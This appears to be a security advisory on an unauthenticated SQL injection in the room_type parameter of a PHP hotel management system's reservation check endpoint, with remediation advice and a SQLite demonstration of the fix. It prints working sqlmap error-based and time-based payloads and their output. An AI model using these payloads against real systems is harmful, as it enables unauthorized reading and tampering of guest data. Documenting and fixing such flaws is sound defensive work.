# SourceCoder Hotel Management System SQL Injection Vulnerability Summary

## Vulnerability Overview

* **Vulnerability name**: SourceCoder Hotel Management System `/index.php/reservation/check` SQL injection
* **Vulnerability type**: SQL Injection
* **Affected product**: a PHP hotel management system built on the CodeIgniter framework
* **Vulnerable location**: `/index.php/reservation/check`
* **Trigger parameter**: `room_type` (POST request)
* **Exploitation conditions**: no login or authorization required; the endpoint is reachable pre-authentication
* **Root cause**: the value of the `room_type` parameter is placed directly into the text of a SQL query without sanitization or validation, so whatever the attacker sends is parsed as part of the statement.

## Scope of Impact

* **Affected version**: V1.0
* **Impact**: an unauthenticated attacker can use this flaw to gain unauthorized database access, read sensitive data (guest and booking records) and tamper with data. Depending on the privileges of the database account and the database configuration this can extend to control of the underlying system or to a denial of service (for example through the time-based payloads below), a serious threat to both system security and business continuity.

## Proof of Concept (POC)

Both payloads come from sqlmap. The `'||(SELECT 0x... WHERE 2021=2021 ... )-- -` wrapper is sqlmap's injection boundary: the leading quote closes the application's string literal, `||` concatenates the result of an attacker-controlled subquery, and the trailing `-- -` comments out the remainder of the original statement. The `customer_TCono62314&` prefix is the preceding field of the POST body as captured.

**Payload 1 (error-based):**

```text
Parameter: room_type (POST)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: customer_TCono62314&room_type=Deluxe'||(SELECT 0x7874952 WHERE 2021=2021 AND GTID_SUBSET(CONCAT(0x7171717171,0x7874952,0x7171717171),FLOOR(RAND(0)*2)))-- -
Vector: AND GTID_SUBSET(CONCAT('[DELIMITER_START]', [QUERY], '[DELIMITER_STOP]'), [RANDOM])
```

**Payload 2 (time-based blind):**

```text
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: customer_TCono62314&room_type=Deluxe'||(SELECT 0x7646966 WHERE 9079=9079 AND (SELECT 2429 FROM (SELECT(SLEEP(5)))RANDSTR))-- -
Vector: AND (SELECT [RANDOMNUM] FROM (SELECT(SLEEP(5)))RANDSTR))-- -
```

A quick manual check for Payload 2 is to time the POST request: a response that takes about 5 seconds longer than a request with a benign `room_type` confirms the `SLEEP(5)` executed on the database server.

**Key output from the sqlmap test screenshot:**

```text
POST parameter 'room_type' is vulnerable. Do you want to keep testing the others?
[sqlmap] (0.6.0) used the default behavior, running in batch mode
sqlmap identified the following injection point(s) with a total of 1593 HTTP(s) requests:

Parameter: room_type (POST)
    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: customer_TCono62314&room_type=Deluxe'||(SELECT 0x7874952 WHERE 2021=2021 AND GTID_SUBSET(CONCAT(0x7171717171,0x7874952,0x7171717171),FLOOR(RAND(0)*2)))-- -
    Vector: AND GTID_SUBSET(CONCAT('[DELIMITER_START]', [QUERY], '[DELIMITER_STOP]'), [RANDOM])

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: customer_TCono62314&room_type=Deluxe'||(SELECT 0x7646966 WHERE 9079=9079 AND (SELECT 2429 FROM (SELECT(SLEEP(5)))RANDSTR))-- -
    Vector: AND (SELECT [RANDOMNUM] FROM (SELECT(SLEEP(5)))RANDSTR))-- -
```

## Remediation

1. **Use prepared statements and parameter binding**: prepared statements prevent SQL injection because they separate the SQL code from the user-supplied data. The statement text is parsed first and the value is sent separately, so a bound value is treated purely as data and is never interpreted as SQL. In CodeIgniter this means passing values through query bindings (`?` placeholders with a bindings array) or the query builder rather than concatenating them into the query string.
2. **Input validation and filtering**: validate user input strictly against its expected format. `room_type` in particular is a small fixed set of values, so it should be checked against an allowlist of known room types and anything else rejected before it reaches the database layer. Validation is defence in depth, not a replacement for parameter binding.
3. **Minimize database user privileges**: make sure the account the application uses to connect to the database has only the privileges it needs. Do not use high-privilege accounts (such as root or admin) for day-to-day operations; this limits what an injection can read, modify or execute (for example file access or stacked administrative statements).
4. **Regular security audits**: audit the code and the system regularly to identify and fix potential vulnerabilities in time. Any other endpoint that builds queries the same way as `/index.php/reservation/check` should be assumed vulnerable until reviewed.
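The following Python script is an added example, not code from the original advisory or from the SourceCoder product. It reproduces the root cause and the first two remediation items against an in-memory SQLite table; the `rooms` table, its columns and the `ALLOWED_ROOM_TYPES` allowlist are assumptions (the real backend is MySQL and the page does not show its schema). The attacker value keeps the same `Deluxe'||(SELECT ... WHERE <condition>)-- -` boundary as the sqlmap payloads above, but because SQLite has neither `GTID_SUBSET` nor `SLEEP` the subquery carries a plain boolean condition instead. With string interpolation the attacker's condition decides what the query returns (and the `-- -` discards the rest of the statement); with a bound parameter the identical value is inert, and the allowlist rejects it before a query is built at all.

```python
import sqlite3

# Constructed sample data (hypothetical schema: the page does not show the
# application's real table or column names).
ROOMS = [
    (1, "Deluxe", 1),  # id, room_type, available
    (2, "Deluxe", 0),
    (3, "Standard", 1),
]

# Assumed allowlist: room types are a small fixed set in a hotel system.
ALLOWED_ROOM_TYPES = {"Standard", "Deluxe", "Suite"}


def make_db():
    """In-memory SQLite database standing in for the application's MySQL backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE rooms (id INTEGER, room_type TEXT, available INTEGER)")
    conn.executemany("INSERT INTO rooms VALUES (?, ?, ?)", ROOMS)
    return conn


def check_vulnerable(conn, room_type):
    """The vulnerable pattern: the POST value is spliced into the SQL text."""
    sql = (
        f"SELECT id FROM rooms WHERE room_type = '{room_type}' "
        "AND available = 1 ORDER BY id"
    )
    return [row[0] for row in conn.execute(sql)]


def check_fixed(conn, room_type):
    """Remediation 1: parameter binding. The value travels separately and is
    never parsed as SQL, so quotes, '||' and '-- -' inside it are just text."""
    sql = "SELECT id FROM rooms WHERE room_type = ? AND available = 1 ORDER BY id"
    return [row[0] for row in conn.execute(sql, (room_type,))]


def validate_room_type(room_type):
    """Remediation 2: allowlist check, rejecting anything that is not a known type."""
    return room_type in ALLOWED_ROOM_TYPES


def check_hardened(conn, room_type):
    """Validation first, then a bound parameter (defence in depth)."""
    if not validate_room_type(room_type):
        raise ValueError(f"rejected room_type {room_type!r}")
    return check_fixed(conn, room_type)


def oracle_payload(condition):
    """Attacker value in the shape of the sqlmap boundary on the page:
    Deluxe'||(SELECT ... WHERE <condition>)-- -

    When <condition> is true the scalar subquery yields '' and the concatenation
    is 'Deluxe', so Deluxe rows come back; when it is false the subquery yields
    NULL, the comparison is NULL and nothing comes back. That difference is the
    oracle sqlmap builds its error-based and time-based checks on. The trailing
    '-- -' comments out the original 'AND available = 1 ORDER BY id'.
    """
    return f"Deluxe'||(SELECT '' WHERE {condition})-- -"


if __name__ == "__main__":
    conn = make_db()
    print("benign value, vulnerable query:", check_vulnerable(conn, "Deluxe"))
    print("true condition, vulnerable query:", check_vulnerable(conn, oracle_payload("2021=2021")))
    print("false condition, vulnerable query:", check_vulnerable(conn, oracle_payload("2021=2022")))
    print("true condition, bound parameter:", check_fixed(conn, oracle_payload("2021=2021")))
    print("payload passes allowlist?", validate_room_type(oracle_payload("2021=2021")))
    try:
        check_hardened(conn, oracle_payload("2021=2021"))
    except ValueError as exc:
        print("hardened path:", exc)
```

Note that with the true condition the vulnerable query also returns room 2, which is not available: the comment terminator stripped the `available = 1` filter, which is why an injection in a lookup like this is not limited to the rows the application meant to expose.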